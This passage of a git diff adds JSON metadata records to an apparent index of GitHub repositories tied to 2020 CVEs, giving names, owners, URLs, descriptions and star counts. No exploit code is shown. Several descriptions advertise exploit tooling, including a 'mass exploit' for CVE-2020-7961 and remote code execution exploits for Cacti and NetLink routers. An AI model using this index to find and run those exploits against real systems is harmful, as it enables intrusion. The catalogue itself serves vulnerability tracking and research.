+ "description": "Reproduce CVE-2020-7471",
+ "fork": false,
+ "created_at": "2021-09-01T16:05:56Z",
+ "updated_at": "2021-09-01T16:45:21Z",
+ "pushed_at": "2021-09-01T16:45:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-7699.json b/2020/CVE-2020-7699.json
new file mode 100644
index 0000000000..ea115bbf5e
--- /dev/null
+++ b/2020/CVE-2020-7699.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 427945657,
+ "name": "CVE-2020-7699_reproduce",
+ "full_name": "hemaoqi-Tom\/CVE-2020-7699_reproduce",
+ "owner": {
+ "login": "hemaoqi-Tom",
+ "id": 41885264,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41885264?v=4",
+ "html_url": "https:\/\/github.com\/hemaoqi-Tom"
+ },
+ "html_url": "https:\/\/github.com\/hemaoqi-Tom\/CVE-2020-7699_reproduce",
+ "description": "针对 CVE-2020-7699 的复现,软件安全原理课程大作业",
+ "fork": false,
+ "created_at": "2021-11-14T14:07:17Z",
+ "updated_at": "2021-11-14T14:09:52Z",
+ "pushed_at": "2022-01-21T11:09:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-7740.json b/2020/CVE-2020-7740.json
new file mode 100644
index 0000000000..564dbd7993
--- /dev/null
+++ b/2020/CVE-2020-7740.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 426966233,
+ "name": "node-pdf-generator-ssrf",
+ "full_name": "CS4239-U6\/node-pdf-generator-ssrf",
+ "owner": {
+ "login": "CS4239-U6",
+ "id": 93301106,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93301106?v=4",
+ "html_url": "https:\/\/github.com\/CS4239-U6"
+ },
+ "html_url": "https:\/\/github.com\/CS4239-U6\/node-pdf-generator-ssrf",
+ "description": "An example of CVE-2020-7740",
+ "fork": false,
+ "created_at": "2021-11-11T10:53:10Z",
+ "updated_at": "2021-11-17T12:58:06Z",
+ "pushed_at": "2021-11-17T12:53:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-7934.json b/2020/CVE-2020-7934.json
index 18d3e23829..a16ca156ee 100644
--- a/2020/CVE-2020-7934.json
+++ b/2020/CVE-2020-7934.json
@@ -28,5 +28,35 @@
"watchers": 7,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 455530268,
+ "name": "audit-xss-cve-2020-7934",
+ "full_name": "Sergio235705\/audit-xss-cve-2020-7934",
+ "owner": {
+ "login": "Sergio235705",
+ "id": 51259770,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51259770?v=4",
+ "html_url": "https:\/\/github.com\/Sergio235705"
+ },
+ "html_url": "https:\/\/github.com\/Sergio235705\/audit-xss-cve-2020-7934",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-04T11:56:52Z",
+ "updated_at": "2022-02-04T11:58:21Z",
+ "pushed_at": "2022-02-04T11:58:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-7961.json b/2020/CVE-2020-7961.json
index 9885a6a4cc..f5e57e74e0 100644
--- a/2020/CVE-2020-7961.json
+++ b/2020/CVE-2020-7961.json
@@ -179,6 +179,96 @@
"score": 0,
"subscribers_count": 2
},
+ {
+ "id": 326194141,
+ "name": "CVE-2020-7961-Mass",
+ "full_name": "Udyz\/CVE-2020-7961-Mass",
+ "owner": {
+ "login": "Udyz",
+ "id": 39673284,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39673284?v=4",
+ "html_url": "https:\/\/github.com\/Udyz"
+ },
+ "html_url": "https:\/\/github.com\/Udyz\/CVE-2020-7961-Mass",
+ "description": "CVE-2020–7961 Mass exploit for Script Kiddies",
+ "fork": false,
+ "created_at": "2021-01-02T13:57:59Z",
+ "updated_at": "2023-12-19T20:52:49Z",
+ "pushed_at": "2021-01-03T10:54:20Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 329711989,
+ "name": "CVE-2020-7961",
+ "full_name": "ShutdownRepo\/CVE-2020-7961",
+ "owner": {
+ "login": "ShutdownRepo",
+ "id": 40902872,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40902872?v=4",
+ "html_url": "https:\/\/github.com\/ShutdownRepo"
+ },
+ "html_url": "https:\/\/github.com\/ShutdownRepo\/CVE-2020-7961",
+ "description": "Exploit script for CVE-2020-7961",
+ "fork": false,
+ "created_at": "2021-01-14T19:18:13Z",
+ "updated_at": "2024-01-29T17:31:35Z",
+ "pushed_at": "2021-01-15T10:51:58Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 495004159,
+ "name": "CVE-2020-7961-Mass",
+ "full_name": "pashayogi\/CVE-2020-7961-Mass",
+ "owner": {
+ "login": "pashayogi",
+ "id": 50790111,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4",
+ "html_url": "https:\/\/github.com\/pashayogi"
+ },
+ "html_url": "https:\/\/github.com\/pashayogi\/CVE-2020-7961-Mass",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-22T08:40:53Z",
+ "updated_at": "2023-09-28T11:39:01Z",
+ "pushed_at": "2022-05-22T08:41:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 771915684,
"name": "CVE-2020-7961",
diff --git a/2020/CVE-2020-8165.json b/2020/CVE-2020-8165.json
index b1abd4623b..56cadec524 100644
--- a/2020/CVE-2020-8165.json
+++ b/2020/CVE-2020-8165.json
@@ -88,5 +88,127 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 326508613,
+ "name": "CVE-2020-8165",
+ "full_name": "hybryx\/CVE-2020-8165",
+ "owner": {
+ "login": "hybryx",
+ "id": 43386553,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43386553?v=4",
+ "html_url": "https:\/\/github.com\/hybryx"
+ },
+ "html_url": "https:\/\/github.com\/hybryx\/CVE-2020-8165",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-03T21:59:09Z",
+ "updated_at": "2024-02-12T17:55:05Z",
+ "pushed_at": "2021-01-03T22:07:27Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 329810247,
+ "name": "CVE-2020-8165",
+ "full_name": "AssassinUKG\/CVE-2020-8165",
+ "owner": {
+ "login": "AssassinUKG",
+ "id": 5285547,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5285547?v=4",
+ "html_url": "https:\/\/github.com\/AssassinUKG"
+ },
+ "html_url": "https:\/\/github.com\/AssassinUKG\/CVE-2020-8165",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-15T04:40:24Z",
+ "updated_at": "2021-01-15T04:44:41Z",
+ "pushed_at": "2021-01-15T04:44:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 329840409,
+ "name": "CVE-2020-8165",
+ "full_name": "progfay\/CVE-2020-8165",
+ "owner": {
+ "login": "progfay",
+ "id": 19568747,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19568747?v=4",
+ "html_url": "https:\/\/github.com\/progfay"
+ },
+ "html_url": "https:\/\/github.com\/progfay\/CVE-2020-8165",
+ "description": "PoC for CVE-2020-8165",
+ "fork": false,
+ "created_at": "2021-01-15T07:31:21Z",
+ "updated_at": "2023-01-28T03:22:50Z",
+ "pushed_at": "2021-01-21T01:32:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 338747744,
+ "name": "cve-2020-8165-demo",
+ "full_name": "danielklim\/cve-2020-8165-demo",
+ "owner": {
+ "login": "danielklim",
+ "id": 956111,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/956111?v=4",
+ "html_url": "https:\/\/github.com\/danielklim"
+ },
+ "html_url": "https:\/\/github.com\/danielklim\/cve-2020-8165-demo",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-14T06:57:30Z",
+ "updated_at": "2021-02-19T07:21:15Z",
+ "pushed_at": "2021-02-16T20:37:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-8175.json b/2020/CVE-2020-8175.json
new file mode 100644
index 0000000000..c1569ed41a
--- /dev/null
+++ b/2020/CVE-2020-8175.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 327564361,
+ "name": "get-pixels-updated",
+ "full_name": "knokbak\/get-pixels-updated",
+ "owner": {
+ "login": "knokbak",
+ "id": 65198941,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65198941?v=4",
+ "html_url": "https:\/\/github.com\/knokbak"
+ },
+ "html_url": "https:\/\/github.com\/knokbak\/get-pixels-updated",
+ "description": "An updated version of get-pixels that patches the CVE-2020-8175 security issue.",
+ "fork": false,
+ "created_at": "2021-01-07T09:31:26Z",
+ "updated_at": "2021-01-15T08:57:26Z",
+ "pushed_at": "2021-01-07T10:02:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 327580889,
+ "name": "save-pixels-updated",
+ "full_name": "knokbak\/save-pixels-updated",
+ "owner": {
+ "login": "knokbak",
+ "id": 65198941,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65198941?v=4",
+ "html_url": "https:\/\/github.com\/knokbak"
+ },
+ "html_url": "https:\/\/github.com\/knokbak\/save-pixels-updated",
+ "description": "An updated version of save-pixels that patches the CVE-2020-8175 security issue.",
+ "fork": false,
+ "created_at": "2021-01-07T10:41:09Z",
+ "updated_at": "2021-01-07T10:52:29Z",
+ "pushed_at": "2021-01-07T10:51:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-8277.json b/2020/CVE-2020-8277.json
index 78e7e2b619..30a3fe1e7b 100644
--- a/2020/CVE-2020-8277.json
+++ b/2020/CVE-2020-8277.json
@@ -28,5 +28,35 @@
"watchers": 7,
"score": 0,
"subscribers_count": 3
+ },
+ {
+ "id": 384786682,
+ "name": "CVE-2020-8277",
+ "full_name": "AndrewIjano\/CVE-2020-8277",
+ "owner": {
+ "login": "AndrewIjano",
+ "id": 37511135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37511135?v=4",
+ "html_url": "https:\/\/github.com\/AndrewIjano"
+ },
+ "html_url": "https:\/\/github.com\/AndrewIjano\/CVE-2020-8277",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-10T20:42:11Z",
+ "updated_at": "2021-07-15T01:23:51Z",
+ "pushed_at": "2021-07-15T01:23:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-8287.json b/2020/CVE-2020-8287.json
new file mode 100644
index 0000000000..93624710d2
--- /dev/null
+++ b/2020/CVE-2020-8287.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 326860293,
+ "name": "nodejs-http-transfer-encoding-smuggling-poc",
+ "full_name": "progfay\/nodejs-http-transfer-encoding-smuggling-poc",
+ "owner": {
+ "login": "progfay",
+ "id": 19568747,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19568747?v=4",
+ "html_url": "https:\/\/github.com\/progfay"
+ },
+ "html_url": "https:\/\/github.com\/progfay\/nodejs-http-transfer-encoding-smuggling-poc",
+ "description": "PoC of HTTP Request Smuggling in nodejs (CVE-2020-8287)",
+ "fork": false,
+ "created_at": "2021-01-05T02:09:23Z",
+ "updated_at": "2023-01-28T11:04:02Z",
+ "pushed_at": "2021-01-06T08:05:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-8300.json b/2020/CVE-2020-8300.json
new file mode 100644
index 0000000000..ff32971db2
--- /dev/null
+++ b/2020/CVE-2020-8300.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 377072797,
+ "name": "CitrixADC-CVE-2020-8300",
+ "full_name": "stuartcarroll\/CitrixADC-CVE-2020-8300",
+ "owner": {
+ "login": "stuartcarroll",
+ "id": 8889050,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8889050?v=4",
+ "html_url": "https:\/\/github.com\/stuartcarroll"
+ },
+ "html_url": "https:\/\/github.com\/stuartcarroll\/CitrixADC-CVE-2020-8300",
+ "description": "Detect Citrix ADC SAML action or SAML iDP Profile config vulnerable to CVE-2020-8300 using Citrix ADC NITRO API",
+ "fork": false,
+ "created_at": "2021-06-15T07:21:16Z",
+ "updated_at": "2021-06-21T12:12:36Z",
+ "pushed_at": "2021-06-17T08:31:55Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-8515.json b/2020/CVE-2020-8515.json
index fe668e9737..3e714fee27 100644
--- a/2020/CVE-2020-8515.json
+++ b/2020/CVE-2020-8515.json
@@ -58,5 +58,35 @@
"watchers": 3,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 402223043,
+ "name": "CVE-2020-8515",
+ "full_name": "darrenmartyn\/CVE-2020-8515",
+ "owner": {
+ "login": "darrenmartyn",
+ "id": 49643587,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49643587?v=4",
+ "html_url": "https:\/\/github.com\/darrenmartyn"
+ },
+ "html_url": "https:\/\/github.com\/darrenmartyn\/CVE-2020-8515",
+ "description": "Draytek CVE-2020-8515 PoC",
+ "fork": false,
+ "created_at": "2021-09-01T22:47:54Z",
+ "updated_at": "2022-11-09T18:13:31Z",
+ "pushed_at": "2021-09-04T10:45:18Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-8554.json b/2020/CVE-2020-8554.json
index 200713b3bb..b9dfb00aac 100644
--- a/2020/CVE-2020-8554.json
+++ b/2020/CVE-2020-8554.json
@@ -88,5 +88,65 @@
"watchers": 1,
"score": 0,
"subscribers_count": 6
+ },
+ {
+ "id": 331774345,
+ "name": "CVE-2020-8554",
+ "full_name": "Dviejopomata\/CVE-2020-8554",
+ "owner": {
+ "login": "Dviejopomata",
+ "id": 6862893,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6862893?v=4",
+ "html_url": "https:\/\/github.com\/Dviejopomata"
+ },
+ "html_url": "https:\/\/github.com\/Dviejopomata\/CVE-2020-8554",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-21T22:41:50Z",
+ "updated_at": "2021-01-22T16:29:39Z",
+ "pushed_at": "2021-01-22T16:29:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 337541398,
+ "name": "gatekeeper-cve-2020-8554",
+ "full_name": "alebedev87\/gatekeeper-cve-2020-8554",
+ "owner": {
+ "login": "alebedev87",
+ "id": 18031474,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18031474?v=4",
+ "html_url": "https:\/\/github.com\/alebedev87"
+ },
+ "html_url": "https:\/\/github.com\/alebedev87\/gatekeeper-cve-2020-8554",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-09T21:29:44Z",
+ "updated_at": "2021-02-09T21:31:38Z",
+ "pushed_at": "2021-02-09T21:31:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-8597.json b/2020/CVE-2020-8597.json
index c3ddc4a873..85bbd9f8a8 100644
--- a/2020/CVE-2020-8597.json
+++ b/2020/CVE-2020-8597.json
@@ -92,5 +92,38 @@
"watchers": 0,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 332484104,
+ "name": "CVE-2020-8597",
+ "full_name": "lakwsh\/CVE-2020-8597",
+ "owner": {
+ "login": "lakwsh",
+ "id": 13025769,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13025769?v=4",
+ "html_url": "https:\/\/github.com\/lakwsh"
+ },
+ "html_url": "https:\/\/github.com\/lakwsh\/CVE-2020-8597",
+ "description": "CVE-2020-8597 in RM2100",
+ "fork": false,
+ "created_at": "2021-01-24T15:28:00Z",
+ "updated_at": "2022-07-21T06:11:35Z",
+ "pushed_at": "2021-01-24T15:46:11Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": true,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-8597",
+ "rm2100"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-8637.json b/2020/CVE-2020-8637.json
new file mode 100644
index 0000000000..87f8867cd9
--- /dev/null
+++ b/2020/CVE-2020-8637.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 338988423,
+ "name": "CVE-2020-8637",
+ "full_name": "DXY0411\/CVE-2020-8637",
+ "owner": {
+ "login": "DXY0411",
+ "id": 42259364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42259364?v=4",
+ "html_url": "https:\/\/github.com\/DXY0411"
+ },
+ "html_url": "https:\/\/github.com\/DXY0411\/CVE-2020-8637",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-15T06:38:35Z",
+ "updated_at": "2021-02-21T06:00:31Z",
+ "pushed_at": "2021-02-21T06:00:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-8813.json b/2020/CVE-2020-8813.json
index a801a3a783..81cf116b7e 100644
--- a/2020/CVE-2020-8813.json
+++ b/2020/CVE-2020-8813.json
@@ -29,6 +29,66 @@
"score": 0,
"subscribers_count": 2
},
+ {
+ "id": 366529600,
+ "name": "Cacti-CVE-2020-8813",
+ "full_name": "0xm4ud\/Cacti-CVE-2020-8813",
+ "owner": {
+ "login": "0xm4ud",
+ "id": 56730389,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56730389?v=4",
+ "html_url": "https:\/\/github.com\/0xm4ud"
+ },
+ "html_url": "https:\/\/github.com\/0xm4ud\/Cacti-CVE-2020-8813",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-11T22:38:39Z",
+ "updated_at": "2021-12-02T17:50:26Z",
+ "pushed_at": "2021-05-14T17:15:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 371780179,
+ "name": "CVE-2020-8813",
+ "full_name": "hexcowboy\/CVE-2020-8813",
+ "owner": {
+ "login": "hexcowboy",
+ "id": 8162609,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8162609?v=4",
+ "html_url": "https:\/\/github.com\/hexcowboy"
+ },
+ "html_url": "https:\/\/github.com\/hexcowboy\/CVE-2020-8813",
+ "description": "Cacti v1.2.8 Unauthenticated Remote Code Execution",
+ "fork": false,
+ "created_at": "2021-05-28T17:55:49Z",
+ "updated_at": "2023-02-06T08:53:29Z",
+ "pushed_at": "2021-05-29T12:34:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
{
"id": 543566460,
"name": "CVE-2020-8813-Cacti-RCE-in-graph_realtime",
diff --git a/2020/CVE-2020-8835.json b/2020/CVE-2020-8835.json
index 89bf289463..55cda476a6 100644
--- a/2020/CVE-2020-8835.json
+++ b/2020/CVE-2020-8835.json
@@ -119,6 +119,36 @@
"score": 0,
"subscribers_count": 2
},
+ {
+ "id": 373897544,
+ "name": "CVE-2020-8835-verification",
+ "full_name": "digamma-ai\/CVE-2020-8835-verification",
+ "owner": {
+ "login": "digamma-ai",
+ "id": 29720627,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29720627?v=4",
+ "html_url": "https:\/\/github.com\/digamma-ai"
+ },
+ "html_url": "https:\/\/github.com\/digamma-ai\/CVE-2020-8835-verification",
+ "description": "Formal verification example for CVE-2020-8835",
+ "fork": false,
+ "created_at": "2021-06-04T16:15:21Z",
+ "updated_at": "2022-02-05T02:10:04Z",
+ "pushed_at": "2021-06-08T21:42:40Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 4
+ },
{
"id": 616611138,
"name": "INF8602-CVE-2020-8835",
diff --git a/2020/CVE-2020-8840.json b/2020/CVE-2020-8840.json
index 4a82f5cb38..ffd1b67290 100644
--- a/2020/CVE-2020-8840.json
+++ b/2020/CVE-2020-8840.json
@@ -148,5 +148,35 @@
"watchers": 5,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 333189009,
+ "name": "CVE-2020-8840",
+ "full_name": "dpredrag\/CVE-2020-8840",
+ "owner": {
+ "login": "dpredrag",
+ "id": 3372646,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3372646?v=4",
+ "html_url": "https:\/\/github.com\/dpredrag"
+ },
+ "html_url": "https:\/\/github.com\/dpredrag\/CVE-2020-8840",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-26T19:10:22Z",
+ "updated_at": "2023-08-11T13:51:38Z",
+ "pushed_at": "2021-01-26T19:29:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-8958.json b/2020/CVE-2020-8958.json
index b34daec3f0..05ec0f515a 100644
--- a/2020/CVE-2020-8958.json
+++ b/2020/CVE-2020-8958.json
@@ -30,5 +30,40 @@
"watchers": 5,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 362168700,
+ "name": "CVE-2020-8958",
+ "full_name": "Asjidkalam\/CVE-2020-8958",
+ "owner": {
+ "login": "Asjidkalam",
+ "id": 16708391,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16708391?v=4",
+ "html_url": "https:\/\/github.com\/Asjidkalam"
+ },
+ "html_url": "https:\/\/github.com\/Asjidkalam\/CVE-2020-8958",
+ "description": "CVE-2020-8958: Authenticated RCE exploit for NetLink HG323",
+ "fork": false,
+ "created_at": "2021-04-27T15:51:08Z",
+ "updated_at": "2023-12-17T13:59:13Z",
+ "pushed_at": "2021-04-28T16:27:01Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "command-injection",
+ "exploit",
+ "router",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-9054.json b/2020/CVE-2020-9054.json
new file mode 100644
index 0000000000..600237d101
--- /dev/null
+++ b/2020/CVE-2020-9054.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 404790387,
+ "name": "CVE-2020-9054",
+ "full_name": "darrenmartyn\/CVE-2020-9054",
+ "owner": {
+ "login": "darrenmartyn",
+ "id": 49643587,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49643587?v=4",
+ "html_url": "https:\/\/github.com\/darrenmartyn"
+ },
+ "html_url": "https:\/\/github.com\/darrenmartyn\/CVE-2020-9054",
+ "description": "CVE-2020-9054 PoC for Zyxel",
+ "fork": false,
+ "created_at": "2021-09-09T16:16:34Z",
+ "updated_at": "2023-10-08T23:35:13Z",
+ "pushed_at": "2021-09-09T16:18:07Z",
+ "stargazers_count": 2,
